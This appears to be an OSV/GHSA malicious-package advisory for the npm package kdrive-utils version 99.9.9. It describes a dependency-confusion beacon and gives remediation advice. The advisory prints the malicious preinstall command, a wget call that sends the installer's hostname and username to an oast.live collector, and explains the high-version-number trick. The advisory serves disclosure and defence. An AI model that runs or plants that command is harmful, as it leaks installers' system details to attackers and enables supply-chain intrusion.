MAL-2026-6295

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/kdrive-utils/MAL-2026-6295.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6295
Aliases
  • GHSA-v9x6-7mvw-mf22
Published
2026-06-23T14:10:49Z
Modified
2026-07-23T07:51:46.733905232Z
Summary
Malicious code in kdrive-utils (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943)

package.json declares a preinstall lifecycle script that auto-executes on npm install and runs wget -q -O- "http://d8svb0ao12pnoovdaih0giunhdew5oqa4.oast.live/$(hostname)/$(whoami)". The installer's hostname and current OS username are embedded directly into the request path and sent over plain HTTP to an oast.live (Interactsh / out-of-band application security testing) listener — an attacker-controlled DNS/HTTP collector commonly used for supply-chain reconnaissance and typosquat/dependency-confusion probes. The package is an unscoped name published at version 99.9.9, which is the canonical dependency-confusion shape (high version number to win resolution against an internal package of the same name). No legitimate functionality is shipped beyond the beacon.

Source: ghsa-malware (af3ba8ae8b3253da7029ddc1f0a9eab89034731b2ae2ecb6f61dbbdf3bd3c03a)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-23T14:10:49Z",
            "id": "IN-MAL-2026-007201",
            "import_time": "2026-06-23T14:23:02.850265321Z",
            "versions": [
                "99.9.9"
            ],
            "source": "amazon-inspector",
            "sha256": "3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943"
        },
        {
            "ranges": [
                {
                    "type": "SEMVER",
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ]
                }
            ],
            "id": "GHSA-v9x6-7mvw-mf22",
            "import_time": "2026-06-26T05:41:02.349044842Z",
            "modified_time": "2026-06-26T05:12:25Z",
            "source": "ghsa-malware",
            "sha256": "af3ba8ae8b3253da7029ddc1f0a9eab89034731b2ae2ecb6f61dbbdf3bd3c03a"
        },
        {
            "modified_time": "2026-07-20T10:47:55Z",
            "id": "RLMA-2026-05564",
            "import_time": "2026-07-20T13:14:48.464465385Z",
            "versions": [
                "99.9.9"
            ],
            "source": "reversing-labs",
            "sha256": "5a419f3953f433537ae4e3e588445a181ca6cc4b85d4a070a03a41d88229b32c"
        }
    ]
}
References
Credits

Affected packages

npm / kdrive-utils

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

99.*
99.9.9

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "kdrive-utils-99.9.9.tgz",
            "hashes": {
                "sha512_sri": "sha512-Dqvumed8dz0pGCUo0GixsrzVTgwqR5EkrmJQeJX+zsU5RdfonHXyBaaZtVJMuYxTw0JeyQZpeNGmErWbEUKs2A==",
                "sha1": "415c520c5996bac1e61987623d5d77f1b01b6008"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "09d05b298d62d93719c446765977a50ab5604d6e00987d1977431118407c77264ba64d",
            "sha256": "3e083f1bb63f99ec23aa5406ef23b8d95565aa155a08a7f5fc5e1c96a71a2e29"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/kdrive-utils/MAL-2026-6295.json"